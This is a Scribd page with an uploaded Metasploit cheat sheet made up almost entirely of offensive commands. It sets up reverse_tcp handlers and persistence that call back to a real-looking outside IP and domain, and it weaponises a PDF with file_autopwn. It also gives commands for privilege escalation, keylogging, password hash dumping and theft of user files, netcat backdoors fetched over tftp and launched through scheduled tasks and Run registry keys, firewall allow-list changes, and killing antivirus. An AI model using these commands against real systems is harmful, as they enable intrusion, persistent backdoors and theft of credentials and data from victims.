Scribd
Upload
256 views

Cheat Sheet of Metasploit

This document provides a cheat sheet of commands for the Metasploit framework. It includes commands for configuring exploits and payloads, executing exploits, gaining persistence on Windows systems, privilege escalation, and removing antivirus software. The document then provides examples of using Metasploit for tasks like port forwarding, keylogging, network scanning, password dumping, and uploading files.

Uploaded by

fuddu
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
256 views

Cheat Sheet of Metasploit

This document provides a cheat sheet of commands for the Metasploit framework. It includes commands for configuring exploits and payloads, executing exploits, gaining persistence on Windows systems, privilege escalation, and removing antivirus software. The document then provides examples of using Metasploit for tasks like port forwarding, keylogging, network scanning, password dumping, and uploading files.

Uploaded by

fuddu
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 7

Cheat sheet of Metasploit… Commands are as follows..

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false
# set AutoRunScript pathto script you want to autorun after exploit is run
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

exploit -j -z

# file_autopwn
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3

wget -O /tmp/file3.pdf
https://www1.nga.mil/Newsroom/PressR…s/nga10_02.pdf

./msfconsole

db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf

use auxiliary/server/file_autopwn

set OUTPATH /tmp/1


set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run

# shows all the scripts


run

# persistence! broken …if you use DNS name ..


run persistence -r 75.139.158.51 -p 21 -A -X -i 30

run get_pidgin_creds

idletime
sysinfo

# SYSTEM SHELL ( pick a proc that is run by system )


migrate 376
shell

# session hijack tokens


use incognito
impersonate_token “NT AUTHORITY\\SYSTEM”
# escalate to system
use priv
getsystem

execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t

# list top used apps


run prefetchtool -x 20

# list installed apps


run prefetchtool -p

run get_local_subnets

# find and download files


run search_dwld “%USERPROFILE%\\my documents” passwd
run search_dwld “%USERPROFILE%\\desktop passwd
run search_dwld “%USERPROFILE%\\my documents” office
run search_dwld “%USERPROFILE%\\desktop” office
# alternate
download -r “%USERPROFILE%\\desktop” ~/
download -r “%USERPROFILE%\\my documents” ~/

# alternate to shell not SYSTEM


# execute -f cmd.exe -H -c -i -t

# does some run wmic commands etc


run winenum

# rev shell the hard way


run scheduleme -m 1 -u /tmp/nc.exe -o “-e cmd.exe -L -p 8080”

# An example of a run of the file to download via tftp of Netcat and then
running it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c “tftp -i 192.168.1.8 GET nc.exe,nc -L -p
8080 -e cmd.exe” -d 4
run schtasksabuse -t 192.168.1.7 -c “tftp -i 192.168.1.8 GET nc.exe,nc -L -p
8080 -e cmd.exe” -d 4

# vnc / port fwd for linux


run vnc

# priv esc
run kitrap0d
run getgui

# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!


run killav

run winemun

run memdump

run screen_unlock

upload /tmp/system32.exe C:\\windows\\system32\\


reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion
\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v
system32 -d “C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe”
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion
\\Run -v system32
reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess
\\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list
reg setval -k HKLM\\system\\controlset001\services\\sharedaccess
\\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list
-v sys
reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess
\\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list
-v system32
upload /neo/wallpaper1.bmp “C:\\documents and settings\\pentest3\\local
settings\\application data\\microsoft\\”
getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80″
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666

shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787

run msf_bind
run msf_bind -p 1975
rev2self
getuid

getuid

enumdesktops
grabdesktop

run deploymsf -f framework-3.3-dev.exe

run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d google.com
run netenum -rl -r 10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254

# Windows Login Brute Force Meterpreter Script


run winbf -h

# upload a script or executable and run it


uploadexec

# Using Payload As A Backdoor from a shell

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre


ntVersion\Run /v firewall /t REG_SZ /d
“c:\windows\system32\metabkdr.exe” /f
at 19:00 /every:M,T,W,Th,F cmd /c start “%USERPROFILE%\metabkdr.exe”
SCHTASKS /Create /RU “SYSTEM” /SC MINUTE /MO 45 /TN FIREWALL
/TR “%USERPROFILE%\metabkdr.exe” /ED 11/11/2011

# kill AV this will not unload it from mem it needs reboot or kill from memory
still … Darkspy, Seem, Icesword GUI can kill the tasks
catchme.exe -K “c:\Program Files\Kaspersky\avp.exe”
catchme.exe -E “c:\Program Files\Kaspersky\avp.exe”
catchme.exe -O “c:\Program Files\Kaspersky\avp.exe” dummy

You might also like